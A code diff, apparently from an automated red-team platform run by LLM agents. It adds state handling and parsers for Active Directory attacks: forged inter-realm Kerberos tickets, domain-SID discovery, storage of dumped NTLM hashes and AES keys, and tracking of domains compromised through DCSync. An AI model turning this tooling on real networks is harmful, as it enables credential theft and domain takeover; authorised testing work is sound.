+    /// The foreign forest the ticket is valid for.
+    pub target_domain: String,
+    /// Username encoded in the ticket (typically `Administrator`).
+    pub username: String,
+    /// Absolute path to the `.ccache` file on the worker filesystem.
+    pub ticket_path: String,
+    /// When the ticket was forged (UTC).
+    #[serde(default, skip_serializing_if = "Option::is_none")]
+    pub forged_at: Option<DateTime<Utc>>,
+}
+
+impl KerberosTicket {
+    /// Redis HASH field key: `{source}:{target}:{username}`.
+    pub fn dedup_key(&self) -> String {
+        format!(
+            "{}:{}:{}",
+            self.source_domain.to_lowercase(),
+            self.target_domain.to_lowercase(),
+            self.username.to_lowercase()
+        )
+    }
+}
diff --git a/ares-core/src/models/mod.rs b/ares-core/src/models/mod.rs
index ce1d432e..0e24b690 100644
--- a/ares-core/src/models/mod.rs
+++ b/ares-core/src/models/mod.rs
@@ -15,7 +15,10 @@ pub use blue::{
     BlueTaskInfo, Evidence, InvestigationStage, PyramidLevel, SharedBlueTeamState, TimelineEvent,
     TriageDecision, TriageRecord,
 };
-pub use core::{Credential, Hash, Host, Share, Target, TrustInfo, User};
+pub use core::{
+    is_always_disabled_account, CandidateDomain, Credential, DomainEvidence, Hash, Host,
+    KerberosTicket, Share, Target, TrustInfo, User,
+};
 pub use operation::{AttackChainStep, OperationMeta, SharedRedTeamState};
 pub use task::{
     AgentInfo, AgentRole, TaskInfo, TaskResult, TaskStatus, TaskStatusRecord, VulnerabilityInfo,
@@ -156,4 +159,22 @@ mod tests {
         assert_eq!(TaskStatus::InProgress.to_string(), "in_progress");
         assert_eq!(TaskStatus::Pending.to_string(), "pending");
     }
+
+    #[test]
+    fn is_always_disabled_account_canonical() {
+        assert!(is_always_disabled_account("Guest"));
+        assert!(is_always_disabled_account("guest"));
+        assert!(is_always_disabled_account("GUEST"));
+        assert!(is_always_disabled_account("krbtgt"));
+        assert!(is_always_disabled_account("DefaultAccount"));
+        assert!(is_always_disabled_account("WDAGUtilityAccount"));
+    }
+
+    #[test]
+    fn is_always_disabled_account_excludes_real_users() {
+        assert!(!is_always_disabled_account("Administrator"));
+        assert!(!is_always_disabled_account("svc_sql"));
+        assert!(!is_always_disabled_account("jdoe"));
+        assert!(!is_always_disabled_account(""));
+    }
 }
diff --git a/ares-core/src/parsing/domain_sid.rs b/ares-core/src/parsing/domain_sid.rs
index b7ee5a01..472dcf4e 100644
--- a/ares-core/src/parsing/domain_sid.rs
+++ b/ares-core/src/parsing/domain_sid.rs
@@ -6,15 +6,64 @@ use std::sync::LazyLock;
 static DOMAIN_SID_RE: LazyLock<Regex> =
     LazyLock::new(|| Regex::new(r"S-1-5-21-\d+-\d+-\d+").expect("domain sid regex"));
 
+/// Match the impacket-lookupsid "Domain SID is:" announcement line — the
+/// authoritative signal that the surrounding output is a genuine LSARPC SID
+/// brute-force, not arbitrary recon text containing stray SIDs.
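+///
+/// Illustrative line it anchors on:
+///
+/// ```text
+/// [*] Domain SID is: S-1-5-21-3030751166-2423545109-3706592460
+/// ```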
+pub static LOOKUPSID_HEADER_RE: LazyLock<Regex> = LazyLock::new(|| {
+    Regex::new(r"(?m)^\[\*\]\s+Domain SID is:\s+(S-1-5-21-\d+-\d+-\d+)")
+        .expect("lookupsid header regex")
+});
+
+/// Match `rpcclient -c lsaquery` output. Produces:
+///
+/// ```text
+/// Domain Name: FABRIKAM
+/// Domain Sid: S-1-5-21-3030751166-2423545109-3706592460
+/// ```
+///
+/// Like impacket-lookupsid, this is an authoritative LSARPC response — the
+/// flat name and SID together belong to the queried server's primary domain.
+/// Often works with anonymous/null sessions where impacket-lookupsid fails,
+/// so it's the primary unauth path for cross-forest target SID discovery.
+pub static LSAQUERY_DOMAIN_SID_RE: LazyLock<Regex> = LazyLock::new(|| {
+    Regex::new(r"(?m)^Domain Name:\s+(\S+)\s*\r?\nDomain Sid:\s+(S-1-5-21-\d+-\d+-\d+)")
+        .expect("lsaquery domain sid regex")
+});
+
 /// Regex to extract the RID-500 account name from lookupsid output.
 /// Matches lines like: `500: DOMAIN\AccountName (SidTypeUser)`
 static RID500_RE: LazyLock<Regex> = LazyLock::new(|| {
     Regex::new(r"(?m)^500:\s+[^\\]+\\(.+?)\s+\(SidTypeUser\)").expect("rid500 regex")
 });
 
-/// Extract the first domain SID (`S-1-5-21-...`) found in the output.
+/// Regex matching any RID line in lookupsid output to capture the flat/NetBIOS
+/// domain name. Matches lines like: `500: DOMAIN\AccountName (SidType...)`.
+static RID_FLAT_NAME_RE: LazyLock<Regex> = LazyLock::new(|| {
+    Regex::new(r"(?m)^\d+:\s+([^\\\s]+)\\.+?\s+\(SidType").expect("rid flat name regex")
+});
+
+/// Extract the first *bare* domain SID (`S-1-5-21-A-B-C`) found in the output.
+///
+/// "Bare" means the matched SID is **not** the prefix of a longer principal
+/// SID like `S-1-5-21-A-B-C-RID`. Such longer SIDs appear in LDAP recon
+/// output as Foreign Security Principals (e.g. `S-1-5-21-…-519` for a
+/// foreign Enterprise Admins group) and previously caused this function to
+/// truncate them into a fake "domain SID" that didn't belong to any domain
+/// — which then misled the orchestrator into forging tickets with the wrong
+/// ExtraSid.
 pub fn extract_domain_sid(output: &str) -> Option<String> {
-    DOMAIN_SID_RE.find(output).map(|m| m.as_str().to_string())
+    let bytes = output.as_bytes();
+    for m in DOMAIN_SID_RE.find_iter(output) {
+        let end = m.end();
+        let next = bytes.get(end).copied();
+        let after_next = bytes.get(end + 1).copied();
+        // Reject when the match is followed by `-<digit>` (truncated longer SID).
+        if next == Some(b'-') && matches!(after_next, Some(b) if b.is_ascii_digit()) {
+            continue;
+        }
+        return Some(m.as_str().to_string());
+    }
+    None
 }
 
 /// Extract the account name for RID 500 from lookupsid output.
@@ -27,6 +76,36 @@ pub fn extract_rid500_name(output: &str) -> Option<String> {
     RID500_RE.captures(output).map(|c| c[1].to_string())
 }
 
+/// Extract `(flat_name, sid)` together from lookupsid output, anchoring the
+/// SID to the NetBIOS/flat name visible on the same RID lines.
+///
+/// Returns `None` if either the SID or the flat name is missing — the caller
+/// must then resolve the FQDN itself rather than guessing from task context.
+///
+/// Why this matters: a task targeting `north.contoso.local` can produce output
+/// referencing `S-1-5-21-…` for the trusted forest's domain (e.g. via lookupsid
+/// over a foreign trust). Anchoring to the flat name lets the caller map the
+/// SID to the correct FQDN via `netbios_to_fqdn` instead of misattributing it
+/// to the task's source domain.
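+///
+/// Illustrative: output containing `[*] Domain SID is: S-1-5-21-1-2-3` plus a
+/// RID line `500: FABRIKAM\Administrator (SidTypeUser)` yields
+/// `Some(("FABRIKAM".into(), "S-1-5-21-1-2-3".into()))`.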
+pub fn extract_domain_sid_and_flat_name(output: &str) -> Option<(String, String)> {
+    let sid = extract_domain_sid(output)?;
+    let flat = RID_FLAT_NAME_RE
+        .captures(output)
+        .map(|c| c[1].to_uppercase())?;
+    Some((flat, sid))
+}
+
+/// Extract `(flat_name, sid)` from `rpcclient lsaquery` output. Returns the
+/// queried server's primary-domain flat name (uppercased) paired with the
+/// authoritative LSARPC-reported domain SID. Returns `None` if the output is
+/// not from `lsaquery` or only one of the two fields is present.
+pub fn extract_lsaquery_domain_sid(output: &str) -> Option<(String, String)> {
+    let caps = LSAQUERY_DOMAIN_SID_RE.captures(output)?;
+    let flat = caps.get(1)?.as_str().to_uppercase();
+    let sid = caps.get(2)?.as_str().to_string();
+    Some((flat, sid))
+}
+
 #[cfg(test)]
 mod tests {
     use super::*;
@@ -103,4 +182,138 @@
         None
     );
 }
+
+    #[test]
+    fn extracts_flat_name_alongside_sid() {
+        let output = "[*] Brute forcing SIDs at 192.168.58.10\n\
+                      [*] Domain SID is: S-1-5-21-100-200-300\n\
+                      498: CONTOSO\\Enterprise Read-only Domain Controllers (SidTypeGroup)\n\
+                      500: CONTOSO\\Administrator (SidTypeUser)\n";
+        let result = extract_domain_sid_and_flat_name(output);
+        assert_eq!(
+            result,
+            Some(("CONTOSO".to_string(), "S-1-5-21-100-200-300".to_string()))
+        );
+    }
+
+    #[test]
+    fn extract_flat_name_and_sid_uppercases() {
+        let output = "[*] Domain SID is: S-1-5-21-1-2-3\n\
+                      500: contoso\\Administrator (SidTypeUser)\n";
+        let result = extract_domain_sid_and_flat_name(output);
+        assert_eq!(result.as_ref().map(|(f, _)| f.as_str()), Some("CONTOSO"));
+    }
+
+    #[test]
+    fn extract_flat_name_without_sid_returns_none() {
+        let output = "500: CONTOSO\\Administrator (SidTypeUser)\n";
+        assert_eq!(extract_domain_sid_and_flat_name(output), None);
+    }
+
+    #[test]
+    fn extract_flat_name_without_rid_lines_returns_none() {
+        let output = "[*] Domain SID is: S-1-5-21-1-2-3\n";
+        assert_eq!(extract_domain_sid_and_flat_name(output), None);
+    }
+
+    #[test]
+    fn extract_domain_sid_skips_truncated_principal_sid() {
+        // Foreign-security-principal SID `…-519` (Enterprise Admins) must NOT
+        // be silently truncated to a fake domain SID. This was the root cause
+        // of op-20260429-164553 forging a ticket with the wrong ExtraSid.
+        let output = "objectSid: S-1-5-21-3030751166-2423545109-3706592460-519\n";
+        assert_eq!(extract_domain_sid(output), None);
+    }
+
+    #[test]
+    fn extract_domain_sid_skips_principal_returns_later_bare_sid() {
+        let output =
+            "fsp: S-1-5-21-100-200-300-519\nDomain SID is: S-1-5-21-916080216-17955212-404331485\n";
+        assert_eq!(
+            extract_domain_sid(output),
+            Some("S-1-5-21-916080216-17955212-404331485".to_string())
+        );
+    }
+
+    #[test]
+    fn extract_domain_sid_accepts_bare_sid_followed_by_dash_letter() {
+        // A trailing `-<letter>` (e.g. inside a CN) is fine — only `-<digit>`
+        // indicates a truncated longer principal SID.
+ let output = "S-1-5-21-100-200-300-foo\n"; + assert_eq!( + extract_domain_sid(output), + Some("S-1-5-21-100-200-300".to_string()) + ); + } + + #[test] + fn extract_domain_sid_accepts_bare_sid_at_end_of_input() { + let output = "S-1-5-21-100-200-300"; + assert_eq!( + extract_domain_sid(output), + Some("S-1-5-21-100-200-300".to_string()) + ); + } + + #[test] + fn extract_lsaquery_basic() { + let output = "Domain Name: FABRIKAM\n\ + Domain Sid: S-1-5-21-3030751166-2423545109-3706592460\n"; + assert_eq!( + extract_lsaquery_domain_sid(output), + Some(( + "FABRIKAM".to_string(), + "S-1-5-21-3030751166-2423545109-3706592460".to_string() + )) + ); + } + + #[test] + fn extract_lsaquery_with_preamble() { + let output = "[*] Connecting to 192.168.58.58\n\ + Domain Name: CONTOSO\n\ + Domain Sid: S-1-5-21-100-200-300\n\ + [*] Done.\n"; + assert_eq!( + extract_lsaquery_domain_sid(output), + Some(("CONTOSO".to_string(), "S-1-5-21-100-200-300".to_string())) + ); + } + + #[test] + fn extract_lsaquery_uppercases_flat_name() { + let output = "Domain Name: contoso\nDomain Sid: S-1-5-21-1-2-3\n"; + assert_eq!( + extract_lsaquery_domain_sid(output).map(|(f, _)| f), + Some("CONTOSO".to_string()) + ); + } + + #[test] + fn extract_lsaquery_handles_crlf() { + let output = "Domain Name: FABRIKAM\r\nDomain Sid: S-1-5-21-1-2-3\r\n"; + assert_eq!( + extract_lsaquery_domain_sid(output).map(|(_, s)| s), + Some("S-1-5-21-1-2-3".to_string()) + ); + } + + #[test] + fn extract_lsaquery_requires_both_lines() { + // Missing Domain Sid line + let no_sid = "Domain Name: FABRIKAM\n"; + assert_eq!(extract_lsaquery_domain_sid(no_sid), None); + // Missing Domain Name line + let no_name = "Domain Sid: S-1-5-21-1-2-3\n"; + assert_eq!(extract_lsaquery_domain_sid(no_name), None); + } + + #[test] + fn extract_lsaquery_requires_adjacency() { + // Lines not adjacent — pattern intentionally requires them on + // consecutive lines so we don't pair the wrong (flat, sid) when + // multiple servers/responses are concatenated. + let output = "Domain Name: FABRIKAM\nUnrelated line here\nDomain Sid: S-1-5-21-1-2-3\n"; + assert_eq!(extract_lsaquery_domain_sid(output), None); + } } diff --git a/ares-core/src/state/dedup_keys.rs b/ares-core/src/state/dedup_keys.rs index ae7b0c07..70ec6917 100644 --- a/ares-core/src/state/dedup_keys.rs +++ b/ares-core/src/state/dedup_keys.rs @@ -21,12 +21,15 @@ pub fn build_credential_dedup_key(cred: &Credential) -> String { format!("cred:{domain}:{username}:{password_hash_short}") } -/// Build hash dedup key matching Python's `_build_hash_dedup_key()`. +/// Build hash dedup key. /// /// Dedup key format varies by hash type: /// - AS-REP: `asrep:{domain}:{username}` /// - Kerberoast: `krb:{domain}:{username}:{etype}:{spn}` or `krb:{domain}:{username}:{hash[:32]}` -/// - NTLM/other: `ntlm:{domain}:{username}:{hash[:32]}` +/// - NTLM/other: `ntlm:{domain}:{username}:{nt_hash}` — NT half of `lm:nt`, +/// not LM, because AD always emits the empty-LM placeholder +/// `aad3b435b51404eeaad3b435b51404ee` and a `hash_value[..32]` prefix would +/// collapse every user's password rotations into a single dedup slot. 
pub fn build_hash_dedup_key(hash: &Hash) -> String { let hash_type = hash.hash_type.trim().to_lowercase(); let hash_value = &hash.hash_value; @@ -54,8 +57,18 @@ pub fn build_hash_dedup_key(hash: &Hash) -> String { } // NTLM/other - let prefix = &hash_value[..32.min(hash_value.len())]; - format!("ntlm:{domain}:{username}:{prefix}") + let key_part = ntlm_dedup_key_part(hash_value); + format!("ntlm:{domain}:{username}:{key_part}") +} + +/// For an `lm:nt` NTLM pair, return the NT half. For a single 32-char hash +/// (already-NT or non-standard formats), return up to 32 chars. +fn ntlm_dedup_key_part(hash_value: &str) -> &str { + if let Some((_, nt)) = hash_value.split_once(':') { + &nt[..32.min(nt.len())] + } else { + &hash_value[..32.min(hash_value.len())] + } } /// Extract SPN and encryption type from a Kerberoast hash for deduplication. @@ -173,7 +186,49 @@ mod tests { "aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634", ); let key = build_hash_dedup_key(&h); - assert!(key.starts_with("ntlm:contoso.local:admin:")); + // Must include the NT half, not the empty-LM placeholder, otherwise + // every AD account dedups to the same prefix. + assert_eq!( + key, + "ntlm:contoso.local:admin:209c6174da490caeb422f3fa5a7ae634" + ); + } + + #[test] + fn hash_dedup_key_ntlm_password_rotation_distinct() { + // Same user, two different NT hashes (e.g. password rotation between + // dumps). The keys must differ so the second hash is stored, not + // silently dropped by dedup. + let h1 = make_hash( + "admin", + "contoso.local", + "NTLM", + "aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634", + ); + let h2 = make_hash( + "admin", + "contoso.local", + "NTLM", + "aad3b435b51404eeaad3b435b51404ee:1111222233334444555566667777aaaa", + ); + assert_ne!(build_hash_dedup_key(&h1), build_hash_dedup_key(&h2)); + } + + #[test] + fn hash_dedup_key_ntlm_bare_nt_hash() { + // Some sources emit just a 32-char NT hash without the LM:NT pair. + // The key should still be deterministic and stable. + let h = make_hash( + "admin", + "contoso.local", + "NTLM", + "209c6174da490caeb422f3fa5a7ae634", + ); + let key = build_hash_dedup_key(&h); + assert_eq!( + key, + "ntlm:contoso.local:admin:209c6174da490caeb422f3fa5a7ae634" + ); } #[test] diff --git a/ares-core/src/state/keys.rs b/ares-core/src/state/keys.rs index 26929474..a534f7f9 100644 --- a/ares-core/src/state/keys.rs +++ b/ares-core/src/state/keys.rs @@ -22,6 +22,9 @@ pub const KEY_USERS: &str = "users"; pub const KEY_SHARES: &str = "shares"; /// Redis SET key suffix for discovered domain names. pub const KEY_DOMAINS: &str = "domains"; +/// Redis HASH key suffix for candidate domains awaiting corroboration. +/// Field = lowercase FQDN, value = `CandidateDomain` JSON. +pub const KEY_CANDIDATE_DOMAINS: &str = "candidate_domains"; /// Redis HASH key suffix for discovered vulnerabilities (vuln_id → JSON). pub const KEY_VULNS: &str = "vulns"; /// Redis SET key suffix for exploited vulnerability IDs. @@ -62,6 +65,10 @@ pub const KEY_DOMAIN_SIDS: &str = "domain_sids"; pub const KEY_ADMIN_NAMES: &str = "admin_names"; /// Redis HASH key suffix mapping domain FQDN → TrustInfo JSON. pub const KEY_TRUSTED_DOMAINS: &str = "trusted_domains"; +/// Redis SET key suffix for domain FQDNs where krbtgt has been compromised +/// (full domain admin via DCSync). Mirrors `state.dominated_domains` so +/// post-mortem reports and `SCARD` checks see the same view. 
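+/// Full key shape follows the other suffixes: `ares:op:{id}:dominated_domains`.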
+pub const KEY_DOMINATED_DOMAINS: &str = "dominated_domains";
 /// Redis STRING key suffix for operation status JSON.
 pub const KEY_STATUS: &str = "status";
@@ -161,6 +168,10 @@ pub const BLUE_OP_PREFIX: &str = "ares:blue:op";
 #[cfg(feature = "blue")]
 pub const BLUE_STATUS_PREFIX: &str = "ares:blue:inv";
 
+/// Redis HASH key suffix for forged inter-realm Kerberos tickets.
+/// Field = `{source}:{target}:{username}`, value = `KerberosTicket` JSON.
+pub const KEY_KERBEROS_TICKETS: &str = "kerberos_tickets";
+
 #[cfg(test)]
 mod tests {
     use super::*;
@@ -201,6 +212,7 @@
         KEY_DOMAIN_SIDS,
         KEY_ADMIN_NAMES,
         KEY_TRUSTED_DOMAINS,
+        KEY_DOMINATED_DOMAINS,
         KEY_STATUS,
         KEY_MODEL,
         KEY_STOP_REQUESTED,
@@ -247,6 +259,7 @@
         KEY_DOMAIN_SIDS,
         KEY_ADMIN_NAMES,
         KEY_TRUSTED_DOMAINS,
+        KEY_DOMINATED_DOMAINS,
         KEY_STATUS,
         KEY_MODEL,
         KEY_STOP_REQUESTED,
diff --git a/ares-core/src/state/mock_redis.rs b/ares-core/src/state/mock_redis.rs
index de7bbd13..639cefbf 100644
--- a/ares-core/src/state/mock_redis.rs
+++ b/ares-core/src/state/mock_redis.rs
@@ -12,6 +12,10 @@ use std::sync::{Arc, Mutex};
 use redis::aio::ConnectionLike;
 use redis::{Cmd, ErrorKind, Pipeline, RedisError, RedisResult, Value};
 
+// ---------------------------------------------------------------------------
+// Storage types
+// ---------------------------------------------------------------------------
+
 enum Stored {
     Str(Vec<u8>),
     Hash(HashMap<Vec<u8>, Vec<u8>>),
@@ -21,6 +25,10 @@
 
 type Data = HashMap<String, Stored>;
 
+// ---------------------------------------------------------------------------
+// MockRedisConnection
+// ---------------------------------------------------------------------------
+
 /// Minimal in-memory Redis mock that supports the command subset used by
 /// `ares-core::state` and `ares-cli::orchestrator::task_queue`.
 #[derive(Clone)]
@@ -96,6 +104,10 @@ impl MockRedisConnection {
     }
 }
 
+// ---------------------------------------------------------------------------
+// ConnectionLike impl
+// ---------------------------------------------------------------------------
+
 impl ConnectionLike for MockRedisConnection {
     fn req_packed_command<'a>(&'a mut self, cmd: &'a Cmd) -> redis::RedisFuture<'a, Value> {
         let mut data = self.data.lock().unwrap();
@@ -126,6 +138,10 @@
     }
 }
 
+// ---------------------------------------------------------------------------
+// Command implementations (free functions operating on Data)
+// ---------------------------------------------------------------------------
+
 fn key(args: &[Vec<u8>], idx: usize) -> String {
     String::from_utf8_lossy(args.get(idx).map(|v| v.as_slice()).unwrap_or_default()).into_owned()
 }
@@ -523,6 +539,10 @@ fn cmd_scan(data: &Data, args: &[Vec<u8>]) -> RedisResult<Value> {
     ]))
 }
 
+// ---------------------------------------------------------------------------
+// Minimal glob matching (supports only `*` wildcard segments)
+// ---------------------------------------------------------------------------
+
 fn glob_match(pattern: &str, input: &str) -> bool {
     let parts: Vec<&str> = pattern.split('*').collect();
     if parts.len() == 1 {
diff --git a/ares-core/src/state/reader.rs b/ares-core/src/state/reader.rs
index 5b6bd72b..2dcd8d44 100644
--- a/ares-core/src/state/reader.rs
+++ b/ares-core/src/state/reader.rs
@@ -6,7 +6,7 @@ use chrono::Utc;
 use redis::AsyncCommands;
 
 use crate::models::{
-    Credential, Hash, Host, OperationMeta, Share, SharedRedTeamState, Target, User,
+    Credential, Hash, Host, KerberosTicket, OperationMeta, Share, SharedRedTeamState, Target, User,
     VulnerabilityInfo,
 };
@@ -347,8 +347,26 @@
         let added: bool = conn.hset_nx(&key, &dedup_field, &data).await?;
         if added {
             let _: () = conn.expire(&key, 86400).await?;
+            return Ok(true);
         }
-        Ok(added)
+
+        // Upsert path: a prior call added this user/hash with no AES256 key,
+        // and this call carries one. Win2016+ DCs reject RC4-only inter-realm
+        // tickets, so the AES key is required for cross-forest forge — we
+        // can't afford to lose it to dedup.
+        if hash.aes_key.is_some() {
+            let existing: Option<String> = conn.hget(&key, &dedup_field).await?;
+            let existing_has_aes = existing
+                .as_deref()
+                .and_then(|s| serde_json::from_str::<Hash>(s).ok())
+                .and_then(|h| h.aes_key)
+                .is_some();
+            if !existing_has_aes {
+                let _: () = conn.hset(&key, &dedup_field, &data).await?;
+                let _: () = conn.expire(&key, 86400).await?;
+            }
+        }
+        Ok(false)
     }
 
     /// Set a meta field in the operation's meta HASH.
@@ -380,6 +398,27 @@
         Ok(())
     }
 
+    /// Get a domain SID from the `domain_sids` HASH.
+    pub async fn get_domain_sid(
+        &self,
+        conn: &mut impl AsyncCommands,
+        domain: &str,
+    ) -> Result<Option<String>, redis::RedisError> {
+        let key = self.key(KEY_DOMAIN_SIDS);
+        let sid: Option<String> = conn.hget(&key, domain).await?;
+        Ok(sid)
+    }
+
+    /// Get all domain SIDs from the `domain_sids` HASH (lowercase keys).
+    pub async fn get_domain_sids(
+        &self,
+        conn: &mut impl AsyncCommands,
+    ) -> Result<HashMap<String, String>, redis::RedisError> {
+        let key = self.key(KEY_DOMAIN_SIDS);
+        let data: HashMap<String, String> = conn.hgetall(&key).await?;
+        Ok(data)
+    }
+
     /// Set the RID-500 account name for a domain in the `admin_names` HASH.
     pub async fn set_admin_name(
         &self,
@@ -393,6 +432,48 @@
         Ok(())
     }
 
+    /// Get the RID-500 account name for a domain from the `admin_names` HASH.
+    pub async fn get_admin_name(
+        &self,
+        conn: &mut impl AsyncCommands,
+        domain: &str,
+    ) -> Result<Option<String>, redis::RedisError> {
+        let key = self.key(KEY_ADMIN_NAMES);
+        let name: Option<String> = conn.hget(&key, domain).await?;
+        Ok(name)
+    }
+
+    /// Add a forged inter-realm Kerberos ticket to `ares:op:{id}:kerberos_tickets` HASH.
+    ///
+    /// Keyed by `{source}:{target}:{username}` for dedup. A newer ticket for
+    /// the same principal silently overwrites the old one (`HSET`, not `HSETNX`).
+    pub async fn add_kerberos_ticket(
+        &self,
+        conn: &mut impl AsyncCommands,
+        ticket: &KerberosTicket,
+    ) -> Result<(), redis::RedisError> {
+        let key = self.key(KEY_KERBEROS_TICKETS);
+        let field = ticket.dedup_key();
+        let data = serde_json::to_string(ticket).unwrap_or_default();
+        let _: () = conn.hset(&key, &field, &data).await?;
+        let _: () = conn.expire(&key, 86400).await?;
+        Ok(())
+    }
+
+    /// Load all forged Kerberos tickets from `ares:op:{id}:kerberos_tickets` HASH.
+    pub async fn get_kerberos_tickets(
+        &self,
+        conn: &mut impl AsyncCommands,
+    ) -> Result<Vec<KerberosTicket>, redis::RedisError> {
+        let key = self.key(KEY_KERBEROS_TICKETS);
+        let items: std::collections::HashMap<String, String> = conn.hgetall(&key).await?;
+        let result = items
+            .into_values()
+            .filter_map(|json_str| try_deserialize(&json_str, "kerberos_ticket"))
+            .collect();
+        Ok(result)
+    }
+
     /// Add a share to `ares:op:{id}:shares` HASH (with dedup by host+name).
     pub async fn add_share(
         &self,
diff --git a/ares-core/src/telemetry/init.rs b/ares-core/src/telemetry/init.rs
index aea64eff..bbfeaec2 100644
--- a/ares-core/src/telemetry/init.rs
+++ b/ares-core/src/telemetry/init.rs
@@ -82,6 +82,7 @@ pub fn init_telemetry(config: TelemetryConfig) -> TelemetryGuard {
         .unwrap_or_else(|_| EnvFilter::new(&config.default_filter));
 
     let fmt_layer = tracing_subscriber::fmt::layer()
+        .with_writer(std::io::stderr)
         .with_target(config.show_target)
         .with_thread_ids(false)
         .with_file(false)
diff --git a/ares-core/src/telemetry/spans/builder.rs b/ares-core/src/telemetry/spans/builder.rs
index 8e6b58c5..e8600c40 100644
--- a/ares-core/src/telemetry/spans/builder.rs
+++ b/ares-core/src/telemetry/spans/builder.rs
@@ -58,13 +58,24 @@ impl AgentSpanBuilder {
         self
     }
 
+    /// Set the target IP. Rejects CIDR ranges and multi-value strings.
     pub fn target_ip(mut self, ip: impl Into<String>) -> Self {
-        self.target.ip = Some(ip.into());
+        let ip = ip.into();
+        // Defense-in-depth: reject values that aren't single IP addresses.
+        // extract_target_info should already sanitize, but guard here too.
+        if !ip.contains('/') && !ip.contains(' ') && ip.parse::<std::net::IpAddr>().is_ok() {
+            self.target.ip = Some(ip);
+        }
         self
     }
 
+    /// Set the target FQDN. Rejects multi-value strings.
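+    /// e.g. `"dc01.contoso.local dc02.contoso.local"` or `"contoso.local/path"`
+    /// is dropped rather than recorded as a bogus destination (illustrative).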
     pub fn target_fqdn(mut self, fqdn: impl Into<String>) -> Self {
-        self.target.fqdn = Some(fqdn.into());
+        let fqdn = fqdn.into();
+        // Defense-in-depth: reject values containing spaces or slashes
+        if !fqdn.contains(' ') && !fqdn.contains('/') {
+            self.target.fqdn = Some(fqdn);
+        }
         self
     }
diff --git a/ares-core/src/telemetry/target.rs b/ares-core/src/telemetry/target.rs
index d7fd9f26..68eced4d 100644
--- a/ares-core/src/telemetry/target.rs
+++ b/ares-core/src/telemetry/target.rs
@@ -17,6 +17,11 @@ pub struct ToolTargetInfo {
 /// - IP: `target_ip`, `target`, `host`, `ip` (if it looks like an IP)
 /// - FQDN: `target_fqdn`, `target`, `host`, `hostname` (if it looks like an FQDN)
 /// - User: `username`, `user`, `target_user`
+///
+/// Values are sanitized before validation: multi-token strings (e.g.,
+/// `"192.168.58.10 192.168.58.20"` or nmap arguments) are split and only the
+/// first token is considered. CIDR ranges (`10.0.0.0/24`) are rejected
+/// because they represent networks, not individual hosts.
 pub fn extract_target_info(arguments: &serde_json::Value) -> ToolTargetInfo {
     let mut info = ToolTargetInfo::default();
 
@@ -25,21 +30,23 @@
         None => return info,
     };
 
-    // Extract IP
+    // Extract IP — sanitize multi-token values first
     for key in &["target_ip", "target", "host", "ip"] {
         if let Some(val) = obj.get(*key).and_then(|v| v.as_str()) {
-            if is_ip_address(val) {
-                info.target_ip = Some(val.to_string());
+            let sanitized = first_token(val);
+            if !is_cidr(sanitized) && is_ip_address(sanitized) {
+                info.target_ip = Some(sanitized.to_string());
                 break;
             }
         }
     }
 
-    // Extract FQDN
+    // Extract FQDN — sanitize multi-token values first
     for key in &["target_fqdn", "target", "host", "hostname"] {
         if let Some(val) = obj.get(*key).and_then(|v| v.as_str()) {
-            if is_likely_fqdn(val) {
-                info.target_fqdn = Some(val.to_string());
+            let sanitized = first_token(val);
+            if is_likely_fqdn(sanitized) {
+                info.target_fqdn = Some(sanitized.to_string());
                 break;
             }
         }
     }
@@ -110,6 +117,29 @@ pub fn infer_target_type_from_info(info: &ToolTargetInfo) -> Option<&'static str> {
     None
 }
 
+/// Extract the first whitespace-delimited token from a string.
+///
+/// Handles cases where LLM agents pass multi-IP scan results or
+/// nmap arguments in a single field, e.g.:
+/// - `"192.168.58.10 192.168.58.20 192.168.58.30"` → `"192.168.58.10"`
+/// - `"192.168.58.40 -p 53,88 --open"` → `"192.168.58.40"`
+fn first_token(s: &str) -> &str {
+    s.split_whitespace().next().unwrap_or(s)
+}
+
+/// Returns true for CIDR notation like `10.0.0.0/24`.
+///
+/// CIDR ranges represent networks, not individual hosts, so they
+/// must not be used as `destination.address` span values.
+fn is_cidr(s: &str) -> bool {
+    if let Some((ip_part, mask)) = s.rsplit_once('/') {
+        if let Ok(bits) = mask.parse::<u8>() {
+            return bits <= 128 && ip_part.parse::<std::net::IpAddr>().is_ok();
+        }
+    }
+    false
+}
+
 fn is_ip_address(s: &str) -> bool {
     s.parse::<std::net::IpAddr>().is_ok()
 }
@@ -182,6 +212,66 @@ mod tests {
         assert!(info.target_fqdn.is_none());
     }
 
+    #[test]
+    fn extract_target_info_rejects_cidr() {
+        let args = serde_json::json!({"target": "192.168.58.0/24"});
+        let info = extract_target_info(&args);
+        assert!(
+            info.target_ip.is_none(),
+            "CIDR should not be used as target_ip"
+        );
+        assert!(info.target_fqdn.is_none());
+    }
+
+    #[test]
+    fn extract_target_info_rejects_cidr_in_target_ip() {
+        let args = serde_json::json!({"target_ip": "192.168.58.0/25"});
+        let info = extract_target_info(&args);
+        assert!(
+            info.target_ip.is_none(),
+            "CIDR should not be used as target_ip"
+        );
+    }
+
+    #[test]
+    fn extract_target_info_multi_ip_takes_first() {
+        let args = serde_json::json!({"target": "192.168.58.10 192.168.58.20 192.168.58.30"});
+        let info = extract_target_info(&args);
+        assert_eq!(info.target_ip.as_deref(), Some("192.168.58.10"));
+    }
+
+    #[test]
+    fn extract_target_info_nmap_args_takes_first_ip() {
+        let args = serde_json::json!({"target": "192.168.58.40 -p 53,88,135 --open -sv -o"});
+        let info = extract_target_info(&args);
+        assert_eq!(info.target_ip.as_deref(), Some("192.168.58.40"));
+    }
+
+    #[test]
+    fn extract_target_info_multi_fqdn_takes_first() {
+        let args = serde_json::json!({"target": "dc01.contoso.local dc02.contoso.local"});
+        let info = extract_target_info(&args);
+        assert_eq!(info.target_fqdn.as_deref(), Some("dc01.contoso.local"));
+    }
+
+    #[test]
+    fn first_token_extracts_correctly() {
+        assert_eq!(first_token("192.168.58.10 192.168.58.20"), "192.168.58.10");
+        assert_eq!(first_token("192.168.58.40 -p 53,88"), "192.168.58.40");
+        assert_eq!(first_token("single"), "single");
+        assert_eq!(first_token(""), "");
+    }
+
+    #[test]
+    fn is_cidr_detects_ranges() {
+        assert!(is_cidr("192.168.58.0/24"));
+        assert!(is_cidr("192.168.0.0/16"));
+        assert!(is_cidr("10.0.0.0/8"));
+        assert!(!is_cidr("192.168.58.10"));
+        assert!(!is_cidr("dc01.contoso.local"));
+        assert!(!is_cidr("192.168.58.0/abc"));
+    }
+
     #[test]
     fn infer_from_info_fqdn() {
         let info = ToolTargetInfo {
